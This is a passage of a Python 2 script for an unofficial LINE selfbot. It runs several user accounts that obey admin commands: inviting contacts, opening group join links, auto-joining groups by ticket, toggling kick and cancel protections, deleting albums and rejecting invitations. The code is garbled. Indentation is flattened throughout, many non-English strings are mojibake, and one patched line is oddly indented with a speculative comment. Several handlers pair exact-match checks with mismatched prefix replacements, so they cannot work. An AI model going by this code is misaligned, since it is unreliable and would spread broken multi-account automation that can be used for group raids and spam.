kk.findAndAddContactsByMid(midd)
kk.inviteIntoGroup(msg.to,[midd])
elif "@Finvite " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("finvite ","")
kc.findAndAddContactsByMid(midd)
kc.inviteIntoGroup(msg.to,[midd])
elif msg.text in ["@bot?"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
# msg.contentType = 13
# msg.contentMetadata = {'mid': Dmid}
# ks.sendMessage(msg)
# msg.contentType = 13
# msg.contentMetadata = {'mid': Emid}
# ka.sendMessage(msg)
# msg.contentType = 13
# msg.contentMetadata = {'mid': Fmid}
# kb.sendMessage(msg)
# msg.contentType = 13
# msg.contentMetadata = {'mid': Gmid}
# ko.sendMessage(msg)
# msg.contentType = 13
# msg.contentMetadata = {'mid': Hmid}
# ke.sendMessage(msg)
elif msg.text in ["@Creator","@creator"]:
if msg.from_ in admin:
msg.contentType = 13
cl.sendText(msg.to, "Owner by FXR")
msg.contentMetadata = {'mid': 'u349dbde6509797ddc33adce5b85cd856'}
cl.sendMessage(msg)
elif msg.text in ["@Me"]:
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.from_}
random.choice(KAC).sendMessage(msg)
# elif msg.text in ["Cv2"]:
# msg.contentType = 13
# msg.contentMetadata = {'mid': Bmid}
# kk.sendMessage(msg)
elif msg.text in ["愛�プレゼント","@Gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
# elif msg.text in ["愛�プレゼント","Cv1 gift"]:
# msg.contentType = 9
# msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
# 'PRDTYPE': 'THEME',
# 'MSGTPL': '6'}
# msg.text = None
# ki.sendMessage(msg)
# elif msg.text in ["愛�プレゼント","Cv2 gift"]:
# msg.contentType = 9
# msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
# 'PRDTYPE': 'THEME',
# 'MSGTPL': '8'}
# msg.text = None
# kk.sendMessage(msg)
# elif msg.text in ["愛�プレゼント","Cv3 gift"]:
# msg.contentType = 9
# msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
# 'PRDTYPE': 'THEME',
# 'MSGTPL': '10'}
# msg.text = None
# kc.sendMessage(msg)
elif msg.text in ["愛�プレゼント","@All gift"]:
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
elif msg.text in ["@Cancel","@cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite Kosong")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI cancel","@Bot cancel"]:
if msg.from_ in admin:
if msg.toType == 2:
    k3 = random.choice(KAC)  # assumed: 'k3' is never defined in this file, so fall back to one of the logged-in clients
    G = k3.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
k3.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
k3.sendText(msg.to,"No one is inviting")
else:
k3.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
k3.sendText(msg.to,"Can not be used outside the group")
else:
k3.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["@Open url","@open url"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite by link open")
else:
cl.sendText(msg.to,"Already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI2 ourl","@ZSI2 link on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Chivas")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI3 ourl","@ZSI3 link on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = False
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done Chivas")
else:
kk.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI4 ourl","@ZSI4 link on"]:
if msg.from_ in admin:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = False
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Chivas")
else:
kc.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@Close url","@close url"]:
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
cl.updateGroup(X)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invite by link Close")
else:
cl.sendText(msg.to,"Already close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI2 curl","@ZSI2 link off"]:
if msg.from_ in admin:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done Chivas")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI3 curl","@ZSI3 link off"]:
if msg.from_ in admin:
if msg.toType == 2:
X = kk.getGroup(msg.to)
X.preventJoinByTicket = True
kk.updateGroup(X)
if wait["lang"] == "JP":
kk.sendText(msg.to,"Done Chivas")
else:
kk.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kk.sendText(msg.to,"Can not be used outside the group")
else:
kk.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI4 curl","@ZSI4 link off"]:
if msg.from_ in admin:
if msg.toType == 2:
X = kc.getGroup(msg.to)
X.preventJoinByTicket = True
kc.updateGroup(X)
if wait["lang"] == "JP":
kc.sendText(msg.to,"Done Chivas")
else:
kc.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
kc.sendText(msg.to,"Can not be used outside the group")
else:
kc.sendText(msg.to,"Not for use less than group")
elif "@jointicket " in msg.text.lower():
if msg.from_ in admin:
rplace=msg.text.lower().replace("@jointicket ","")
if rplace == "on":
wait["atjointicket"]=True
if rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
if msg.from_ in admin:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.mid,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif msg.text == "Ginfo":
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\nmembers:" + str(len(ginfo.members)) + "members\npending:" + sinvitee + "people\nURL:" + u + "it is inside")
else:
cl.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif "@Id Group" == msg.text:
if msg.from_ in admin:
kk.sendText(msg.to,msg.to)
elif "@My mid" == msg.text:
if msg.from_ in admin:
random.choice(KAC).sendText(msg.to, msg.from_)
elif "@Mid all" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
# ks.sendText(msg.to,Dmid)
# ka.sendText(msg.to,Emid)
# kb.sendText(msg.to,Fmid)
# ko.sendText(msg.to,Gmid)
# ke.sendText(msg.to,Hmid)
elif "@Mid 1" == msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,mid)
elif "@Mid 2" == msg.text:
if msg.from_ in admin:
ki.sendText(msg.to,Amid)
elif "@Mid 3" == msg.text:
if msg.from_ in admin:
kk.sendText(msg.to,Bmid)
elif "@Mid 4" == msg.text:
if msg.from_ in admin:
kc.sendText(msg.to,Cmid)
elif msg.text in ["Wkwkwk","Wkwk","Wk","wkwkwk","wkwk","wk"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "100",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
elif msg.text in ["Hehehe","Hehe","He","hehehe","hehe","he"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "10",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Galau"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "9",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
elif msg.text in ["You"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "7",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Hadeuh"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
elif msg.text in ["Please"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "4",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Haaa"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "3",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Lol"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "110",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Hmmm","Hmm","Hm","hmmm","hmm","hm"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "101",
"STKPKGID": "1",
"STKVER": "100" }
ki.sendMessage(msg)
elif msg.text in ["Welcome"]:
if msg.from_ in admin:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
kk.sendMessage(msg)
cl.sendMessage(msg)
elif msg.text in ["@TL: "]:
if msg.from_ in admin:
tl_text = msg.text.replace("TL: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif msg.text in ["@Cn "]:
if msg.from_ in owner:
string = msg.text.replace("Cn ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + " done")
elif msg.text in ["@ZSI2 rename "]:
if msg.from_ in owner:
string = msg.text.replace("ZS2 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = ki.getProfile()
profile_B.displayName = string
ki.updateProfile(profile_B)
ki.sendText(msg.to,"name " + string + " done")
elif msg.text in ["@ZS3 rename "]:
if msg.from_ in owner:
string = msg.text.replace("ZSI3 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kk.getProfile()
profile_B.displayName = string
kk.updateProfile(profile_B)
kk.sendText(msg.to,"name " + string + " done")
elif msg.text in ["@ZS4 rename "]:
if msg.from_ in owner:
string = msg.text.replace("ZSI4 rename ","")
if len(string.decode('utf-8')) <= 20:
profile_B = kc.getProfile()
profile_B.displayName = string
kc.updateProfile(profile_B)
kc.sendText(msg.to,"name " + string + " done")
elif msg.text in ["@Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["@Joinn on","@joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Joinn off","@joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Cancl on","@cancl on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Cancl off","@cancl off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel All Invited Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Gr on","@gr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Gr off","@gr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Contact On","@Contact on","@contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@Contact Off","@Contact off","@contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Send Contact Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オン","@join on","@auto join:on","自動å�ƒåŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オフ","@join off","@auto join:off","自動å�ƒåŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["@gcancel:"]:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒�。�时开请指定人数��")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的�组用自动邀请拒�")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","@leave on","@auto leave:on","強制自動退出:開"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["強制自動退出:オフ","@leave off","@auto leave:off","強制自動退出:關"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","@share on","@Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["共有:オフ","@share off","@Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["@set view"]:
if msg.from_ in admin:
md = ""
if wait["Protectjoin"] == True: md+="lock Block Join\n"
else: md+=" Block Join Off\n"
if wait["Protectgr"] == True: md+="lock Block Group\n"
else: md+=" Block Group Off\n"
if wait["Protectcancl"] == True: md+="lock Cancel All Invited\n"
else: md+=" Cancel All Invited Off\n"
if wait["contact"] == True: md+=" Contact : on\n"
else: md+=" Contact : off\n"
if wait["autoJoin"] == True: md+=" Auto join : on\n"
else: md +=" Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= " Group cancel : off\n"
if wait["leaveRoom"] == True: md+=" Auto leave : on\n"
else: md+=" Auto leave : off\n"
if wait["timeline"] == True: md+=" Share : on\n"
else:md+=" Share : off\n"
if wait["autoAdd"] == True: md+=" Auto add : on\n"
else:md+=" Auto add : off\n"
if wait["commentOn"] == True: md+=" Comment : on\n"
else:md+=" Comment : off\n"
cl.sendText(msg.to,md)
elif "@album merit " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "@album " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "@album remove " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["@group id"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["@cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "@album removeat’" in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","@add on","@auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","@add off","@auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif "@message change: " in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "@message add: " in msg.text:
if msg.from_ in admin:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["@message","è‡ªå‹•è¿½åŠ å•�候語確èª�"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "@comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "@add comment:" in msg.text:
if msg.from_ in admin:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["コメント:オン","@comment on","@comment:on","自動首é �留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","@comment off","@comment:off","自動首é �留言:關"]:
if msg.from_ in admin:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["@comment","留言確�"]:
if msg.from_ in admin:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["@gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZSI2 gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZS3 gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@ZS4 gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["@comment bl "]:
if msg.from_ in admin:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["@comment wl "]:
if msg.from_ in admin:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["@comment bl confirm"]:
if msg.from_ in admin:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Jam on/off Start-------------------#
elif msg.text in ["@Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Fungsi Jam on/off Finish-------------------#
#-------------Fungsi Change Clock Start------------------#
elif msg.text in ["@Change clock"]:
if msg.from_ in admin:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Fungsi Change Clock Finish-----------------#
#-------------Fungsi Jam Update Start---------------------#
elif msg.text in ["@Jam Update"]:
if msg.from_ in admin:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
